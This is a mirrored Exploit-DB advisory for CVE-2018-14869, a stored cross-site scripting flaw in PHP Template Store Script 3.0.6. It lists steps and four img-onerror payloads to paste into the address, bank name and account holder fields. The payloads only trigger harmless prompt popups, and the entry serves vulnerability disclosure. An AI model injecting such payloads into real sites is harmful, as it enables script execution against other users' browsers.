PHP Template Store Script 3.0.6 – Cross-Site Scripting - 体验盒子

作者： Sarafraz Khan

日期： 2018-08-03

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/45143/

*******************************************************************************************
# Exploit Title:PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name 
# Date: 02.08.2018
# Site Titel : Exclusive Scripts
# Vendor Homepage:https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/
# Category: Web Application
# Version: 3.0.6
# Exploit Author: Sarafraz Khan
# Contact: https://www.facebook.com/sarfraj.khan.79
# Web:https://goglequeens.com
# Tested on: Windows 10 -Firefox
# CVE-2018-14869
*****************************************************************************************
 
Proof of Concept:-
--------------------------
1. Goto thesite ( http://www.server.com/ ) .
2- Click on => Login => Register => and then fill the Form and click on Register Now
3-Goto your mail and Verify it.
4-Now come back to site and Sign inusing yourVerified mail and Password.
5-Goto Setting => Personal informationand paste these code in 
Address line 1 => "><img src=x onerror=prompt(/SARAFRAZ/)>
Address Line 2 =>"><img src=x onerror=prompt(/KHAN/)>
 Bank name=>"><img src=x onerror=prompt(/KING/)>
A/C Holder name => "><img src=x onerror=prompt(/GOOGLEQUEENS/)>

and then click on Update Profile.

6-Now You will having popup of /SARAFRAZ/,/KHAN/ , / KING/ and /GOOGLEQUEENS/in you account..

***************************************************************************************